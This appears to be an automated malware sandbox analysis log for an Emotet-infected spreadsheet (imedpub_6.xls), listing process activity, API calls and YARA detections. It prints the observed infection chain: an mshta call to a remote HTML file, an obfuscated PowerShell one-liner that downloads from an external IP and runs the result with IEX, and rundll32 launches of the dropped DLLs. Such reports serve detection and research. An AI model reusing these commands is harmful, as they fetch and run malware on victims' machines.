                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exe TID: 2192Thread sleep time: -240000s >= -30000s
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 3.2 %
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 3.2 %
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                            Source: powershell.exe, 00000006.00000002.672127760.00000000001D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
                            Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00344087 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D4087 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00364087 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C4087 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00204087 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            System process connects to network (likely due to code injection or exploit)
                            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 160.16.102.168 80
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg",bVGdzkK
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq",ZDYuehCO
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq",DllRegisterServer
                            Source: Yara matchFile source: imedpub_6.xls, type: SAMPLE
                            Source: Yara matchFile source: C:\Users\user\Desktop\imedpub_6.xls, type: DROPPED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003DAA7 cpuid
                            Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA,

                            Stealing of Sensitive Information

                            barindex
                            Yara detected Emotet
                            Source: Yara matchFile source: 13.2.rundll32.exe.3b0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.620000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.27b0000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2630000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2830000.16.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2820000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.28a0000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.340000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2420000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.340000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.4a0000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2d30000.20.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.280000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2c80000.18.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.330000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.ac0000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.bd0000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3020000.27.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2820000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2ef0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f40000.24.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f70000.25.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2ec0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.400000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e00000.21.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2420000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2700000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2f60000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f70000.25.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.4a0000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2fc0000.14.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.620000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.430000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e90000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.27d0000.14.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2830000.16.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2fc0000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e80000.22.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.27b0000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3080000.29.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.25b0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2630000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.280000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2820000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2430000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.7f0000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
